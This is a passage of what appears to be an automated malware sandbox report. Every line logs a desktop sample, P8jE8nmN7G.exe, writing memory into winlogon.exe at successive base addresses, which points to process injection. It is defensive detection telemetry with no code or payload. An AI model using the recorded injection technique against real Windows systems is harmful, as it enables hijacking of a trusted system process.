Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE99000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE9B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEBB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CED6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CED9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEDB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEFB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF00000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF01000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF16000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF19000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF1B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF20000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF21000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF36000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF39000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF3B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF40000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF41000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF56000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF59000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF5B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF60000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF61000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF76000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF79000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF7B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF80000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF81000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF96000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF99000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF9B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFBB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFDB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFFB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D000000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D001000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D016000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D019000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D01B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D020000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D021000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D036000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D039000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D03B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D040000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D041000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D056000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D059000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D05B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D060000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D061000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D076000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D079000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D07B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D080000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D081000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D096000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D099000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D09B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0A0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0A1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0B6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0B9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0BB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0C0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0C1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0D6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0D9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0DB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0E0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0E1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0F6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0F9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0FB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D100000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D101000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D116000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D119000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D11B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D120000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D121000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D136000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D139000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D13B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D140000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D141000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D156000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D159000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D15B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D160000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D161000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D176000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D179000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D17B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D180000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D181000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D196000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D199000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D19B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1A0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1A1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1B6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1B9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1BB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1C0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1C1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1D6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1D9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1DB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1E0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1E1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1F6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1F9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1FB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D200000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D201000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D216000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D219000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D21B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D220000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D221000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D236000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D239000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D23B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D240000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D241000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D256000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D259000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D25B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D260000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D261000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D276000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D279000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D27B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D280000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D281000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D296000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D299000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D29B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2A0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2A1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2B6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2B9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2BB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2C0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2C1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2D6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2D9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2DB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2E0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2E1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2F6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2F9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2FB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D300000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D301000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D316000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D319000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D31B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D320000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D321000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D336000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D339000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D33B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D340000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D341000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D356000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D359000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D35B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D360000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D361000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D376000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D379000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D37B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D380000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D381000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D396000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D399000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D39B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3A0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3A1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3B6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3B9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3BB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3C0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3C1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3D6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3D9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3DB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3E0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3E1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3F6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3F9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3FB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D400000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D401000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D416000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D419000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D41B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D420000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D421000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D436000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D439000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D43B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D440000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D441000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D456000Jump to behavior
